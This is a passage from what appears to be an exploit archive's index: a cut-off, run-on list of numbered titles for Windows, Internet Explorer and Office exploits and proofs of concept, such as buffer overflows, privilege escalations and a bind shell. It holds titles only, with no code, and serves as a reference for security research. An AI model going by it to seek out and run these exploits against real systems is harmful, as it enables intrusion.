Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30619] Microsoft Windows Explorer PNG Image - Local Denial Of Service Vulnerability [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [30392] Microsoft Windows ndproxy.sys - Local Privilege Escalation [30160] Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability [29813] Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability [29771] Microsoft Windows Vista Windows Mail Local File Execution Vulnerability [29738] Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability [29659] Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29286] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [29285] Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS [28834] Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability [28482] MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28381] microsoft windows xp/2000/2003 help Multiple Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28263] Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [27930] Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability [27851] Microsoft Windows - Path Conversion Weakness [27051] Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26323] Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25737] Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability [25454] Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25268] Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability [25259] Microsoft Windows XP Local Denial of Service Vulnerability [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24699] Microsoft Windows XP WAV File Handler Denial of Service Vulnerability [24682] Microsoft Windows XP Weak Default Configuration Vulnerability [24605] Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24173] PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability [24125] Microsoft Windows XP Self-Executing Folder Vulnerability [24051] Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23850] Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23675] Microsoft Windows XP HCP URI Handler Arbitrary Command Execution Vulnerability [23504] Microsoft Windows XP/2000 showHelp CHM File Execution Weakness [23247] Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability [23229] Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability [23210] Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability [23179] Oracle MySQL for Microsoft Windows MOF Execution [23101] Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability [23093] Microsoft Windows XP TCP Packet Information Leakage Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22870] Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow Vulnerability [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22824] Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow Vulnerability [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22570] Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22368] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) [22367] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) [22366] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) [22365] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [22303] Microsoft Windows Help program (WinHlp32.exe) Crash PoC [22289] Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability [22255] Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability [22245] Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow Vulnerability [22232] Microsoft Windows XP HCP URI Buffer Overflow Vulnerability [22225] Microsoft Windows XP Redirector Privilege Escalation Vulnerability [22194] Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability [22132] Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability [21954] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) [21953] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) [21952] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) [21951] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) [21717] Microsoft Windows XP HCP URI Handler Abuse Vulnerability [21670] Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability [21485] Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21240] Microsoft Windows XP .Manifest Denial of Service Vulnerability [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21130] Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [21047] Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20861] Microsoft Windows Kernel Intel x64 SYSRET PoC [20613] Microsoft Windows 98/2000 UDP Socket DoS Vulnerability [20596] Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability [20564] Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability [20553] Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability [20528] Microsoft Windows Media Player 7.0 Javascript URL Vulnerability [20460] Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow [20427] Microsoft Windows Media Player 7.0 .ASX Buffer Overflow Vulnerability [20424] Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20317] Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability [20288] Microsoft Windows 9x File Handle Buffer Overflow Vulnerability [20284] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2) [20283] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1) [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20254] Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability [20243] Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability [20240] Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20106] Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19974] Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability [19889] Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability [19798] Microsoft Windows NT 4.0 User Shell Folders Vulnerability [19759] Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS [19754] Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability [19739] Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [19673] Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability [19578] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2) [19577] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1) [19502] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability [19489] Microsoft Windows NT 4.0 DCOM Server Vulnerability [19462] Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19359] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability [19239] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability [19238] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability [19211] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability [19209] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability [19198] Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability [19197] "Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability" [19196] "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability" [19195] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19113] Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19002] Microsoft Windows OLE Object File Handling Remote Code Execution [18819] Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability [18372] Microsoft Windows Assembly Execution Vulnerability MS12-005 [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [17133] Microsoft Windows xp AFD.sys Local Kernel DoS Exploit [17037] PostgreSQL for Microsoft Windows Payload Execution [16957] Oracle MySQL for Microsoft Windows Payload Execution [16660] Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow [16574] Microsoft Windows Shell LNK Code Execution [16374] Microsoft Windows Authenticated User Code Execution [16363] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference [16360] Microsoft Windows SMB Relay Code Execution [15839] Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption [14778] Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) [14733] Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14705] Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability [14674] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) [14670] Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047) [14669] Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest [14668] Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks [14667] Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047) [14666] Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047) [14611] Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048) [14610] Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability [14608] Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048) [14566] "Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow" [14403] Microsoft Windows Automatic LNK Shortcut File Code Execution [13808] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly [12564] Microsoft Windows Outlook Express and Windows Mail Integer Overflow [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [9301] Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit [4045] Microsoft Windows Animated Cursor Stack Overflow Exploit [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [1352] Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) [31118] Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30887] phPay 2.2.1 Windows Installations Local File Include Vulnerability [30773] Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability [30767] Apple Safari 3.0.x for Windows Document.Location.Hash Buffer Overflow Vulnerability [30756] Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities [30749] Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability [30622] Microsoft Internet Explorer 5.0.1 File Upload Vulnerability [30593] Microsoft MFC Library CFileFind::FindFile Buffer Overflow Vulnerability [30567] Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Buffer Overflow Vulnerability [30537] Microsoft MSN Messenger <= 8.0 - Video Conversation Buffer Overflow Vulnerability [30494] Microsoft Internet Explorer 5.0.1 Vector Markup Language VGX.DLL Remote Buffer Overflow Vulnerability [30493] Microsoft XML Core Services <= 6.0 SubstringData Integer Overflow Vulnerability [30490] Microsoft Internet Explorer 5.0.1 TBLinf32.DLL ActiveX Control Remote Code Execution Vulnerability [30455] Microsoft Internet Explorer 6.0 Position:Relative Denial of Service Vulnerability [30397] Windows Kernel win32k.sys - Integer Overflow (MS13-101) [30285] Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability [30281] Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities [30194] Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability [30193] Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability [30176] Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability [30169] WindowsPT 1.2 User ID Key Spoofing Vulnerability [30014] Windows NDPROXY - Local SYSTEM Privilege Escalation [30011] Microsoft Tagged Image File Format (TIFF) Integer Overflow [29951] Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability [29858] MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access [29800] Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability [29741] Microsoft Internet Explorer 7.0 NavCancel.HTM Cross-Site Scripting Vulnerability [29664] Microsoft Office Publisher 2007 - Remote Denial of Service (DoS) Vulnerability [29660] Microsoft Office 2003 - Denial of Service (DoS) Vulnerability [29619] Microsoft Internet Explorer 6.0 - Local File Access Weakness [29536] Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities [29524] Microsoft Word 2000 - Malformed Function Code Execution Vulnerability [29295] Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability [29292] XAMPP for Windows 1.8.2 - Blind SQL Injection [29236] Microsoft Internet Explorer 7.0 CSS Width Element Denial of Service Vulnerability [29229] Microsoft Internet Explorer 6.0 Frame Src Denial of Service Vulnerability [29172] Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability [28996] Messagebox Shellcode (113 bytes) - Any Windows Version [28974] MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free [28897] Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability [28880] Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service Vulnerability [28877] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2) [28876] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1) [28822] Microsoft Class Package Export Tool 5.0.2752 0 Clspack.exe Local Buffer Overflow Vulnerability [28679] Evince PDF Reader - 2.32.0.145 (Windows) and 3.4.0 (Linux) - Denial of Service [28500] Microsoft Indexing Service Query Validation Cross-Site Scripting Vulnerability [28481] MS13-069 Microsoft Internet Explorer CCaret Use-After-Free [28438] Microsoft Internet Explorer 5.0.1 Daxctle.OCX Spline Method Heap Buffer Overflow Vulnerability [28421] Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities [28401] Microsoft Internet Explorer 6.0 Visual Studio COM Object Instantiation Denial of Service Vulnerability [28400] Microsoft Internet Explorer 6.0 TSUserEX.DLL ActiveX Control Memory Corruption Vulnerability [28389] Microsoft Internet Explorer 6.0 MSOE.DLL Denial of Service Vulnerability [28387] Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service Vulnerability [28343] Microsoft Internet Explorer 6.0/7.0 IFrame Refresh Denial of Service Vulnerability [28301] Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service Vulnerability [28286] Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability [28265] Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service Vulnerability [28259] Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow Vulnerability [28258] Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service Vulnerability [28256] Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service Vulnerability [28252] Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service Vulnerability [28246] Microsoft Internet Explorer 6.0 OVCtl Denial of Service Vulnerability [28244] Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability [28238] Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067 [28226] Microsoft PowerPoint 2003 PPT File Closure Memory Corruption [28225] Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue [28224] Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution [28222] microsoft works 8.0 spreadsheet Multiple Vulnerabilities [28213] Microsoft Internet Explorer 6.0 RevealTrans Denial of Service Vulnerability [28207] Microsoft Internet Explorer 6.0 TriEditDocument Denial of Service Vulnerability [28202] Microsoft Internet Explorer 6.0 HtmlDlgSafeHelper Remote Denial of Service Vulnerability [28198] Microsoft Office 2000/2002 Property Code Execution Vulnerability [28197] Microsoft Internet Explorer 6.0 Object.Microsoft.DXTFilter Denial of Service Vulnerability [28196] Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial of Service Vulnerability [28194] Microsoft Internet Explorer 6 RDS.DataControl Denial of Service Vulnerability [28189] Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability [28187] MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free [28169] Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service Vulnerability [28164] Microsoft Internet Explorer 6.0 Href Title Denial of Service Vulnerability [28145] Microsoft Internet Explorer 6.0 ADODB.Recordset Filter Property Denial of Service Vulnerability [28144] Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service Vulnerability [28118] Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure Vulnerability [28087] Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness [28082] MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free [28005] Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability [28001] Microsoft SMB Driver Local Denial of Service Vulnerability [27984] Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability [27971] Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption Vulnerability [27906] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [27850] Microsoft Infotech Storage Library Heap Corruption Vulnerability [27745] Outlook Express 5.5/6.0,Windows Mail MHTML URI Handler Information Disclosure Vulnerability [27744] Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability [27727] Microsoft Internet Explorer 6.0 Nested OBJECT Tag Memory Corruption Vulnerability [27620] Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability [27577] Microsoft Internet Explorer 5.0 Address Bar Spoofing Vulnerability [27476] Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities [27433] Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability [27180] Windows RT ARM Bind Shell (Port 4444) [27082] Microsoft Internet Explorer 5.0.1 Malformed IMG and XML Parsing Denial of Service Vulnerability [27073] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (2) [27072] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (1) [27055] Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability [26985] Microsoft Internet Explorer 5.0.1 HTML Parsing Denial of Service Vulnerabilities [26951] Windows Movie Maker 2.1.4026.0 - (.wav) Crash PoC [26869] Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities [26769] Microsoft Excel 95/97/2000/2002/2003/2004 Malformed Range Memory Corruption Vulnerability [26554] Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation [26517] Microsoft Office PowerPoint 2007 - Crash PoC [26457] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [26292] Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service Vulnerability [26230] Microsoft IIS 5.1 WebDAV HTTP Request Source Code Disclosure Vulnerability [26175] MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow [26167] Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability [25999] Microsoft Internet Explorer textNode Use-After-Free [25992] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial of Service Vulnerability [25991] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering Unspecified Buffer Overflow Vulnerability [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [25912] Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit [25784] Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability [25408] Windows Media Player 11.0.0 (.wav) - Crash PoC [25386] Microsoft Internet Explorer 5.0.1 DHTML Object Race Condition Memory Corruption Vulnerability [25385] Microsoft Internet Explorer 5.0.1 Content Advisor File Handling Buffer Overflow Vulnerability [25294] Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability [25157] Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability [25129] Microsoft Internet Explorer 6.0 Pop-up Window Title Bar Spoofing Weakness [25110] Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities [25095] Microsoft Internet Explorer 5.0.1 Mouse Event URI Status Bar Obfuscation Weakness [25085] Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow Vulnerability [25084] Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability [25032] Windows Media Player 9.0 ActiveX Control File Enumeration Weakness [25031] Windows Media Player 9.0 ActiveX Control Media File Attribute Corruption Weakness [24999] Windows Light HTTPD 0.1 - Buffer Overflow [24968] Mikrotik Syslog Server for Windows 1.15 - Denial of Service [24808] Microsoft Internet Explorer 6.0 Search Pane URI Obfuscation Vulnerability [24802] Microsoft Internet Explorer 6.0 Sysimage Protocol Handler Local File Detection Vulnerability [24800] Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution Vulnerability [24775] Microsoft Internet Explorer 6.0 Infinite Array Sort Denial of Service Vulnerability [24727] Microsoft Internet Explorer 6.0 - Local Resource Enumeration Vulnerability [24720] Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness [24714] Microsoft Internet Explorer 6.0 HTML Form Tags URI Obfuscation Weakness [24712] Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness [24705] Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability [24693] Microsoft Internet Explorer 5.x Valid File Drag and Drop Embedded Code Vulnerability [24687] Microsoft Outlook Express 4.x/5.x/6.0 Plaintext Email Security Policy Bypass Vulnerability [24686] Microsoft Outlook 2003 Security Policy Bypass Vulnerability [24666] Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability [24640] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2) [24639] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1) [24637] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4) [24636] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3) [24635] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2) [24634] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1) [24538] MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free [24495] Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) [24437] Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read [24407] Microsoft Internet Explorer 6.0 Resource Detection Weakness [24366] Windows Manage Memory Payload Injection [24354] Microsoft Internet Explorer 6.0 mms Protocol Handler Executable Command Line Injection Vulnerability [24328] Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability [24281] Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service Vulnerability [24267] Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service Vulnerability [24266] Microsoft Internet Explorer 5.0.1 Popup.show Mouse Event Hijacking Vulnerability [24265] Microsoft Internet Explorer 5.0.1 JavaScript Method Assignment Cross-Domain Scripting Vulnerability [24249] Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness [24213] Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability [24211] Microsoft Internet Explorer 6.0 HREF Save As Denial of Service Vulnerability [24187] Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness [24174] Microsoft Internet Explorer 6.0 URL Local Resource Access Weakness [24135] Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption Vulnerability [24119] Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability [24118] Microsoft Outlook Express 6.0 URI Obfuscation Vulnerability [24117] Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness [24114] Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness [24112] Microsoft Internet Explorer 6.0 XML Parsing Denial of Service Vulnerability [24102] Microsoft Internet 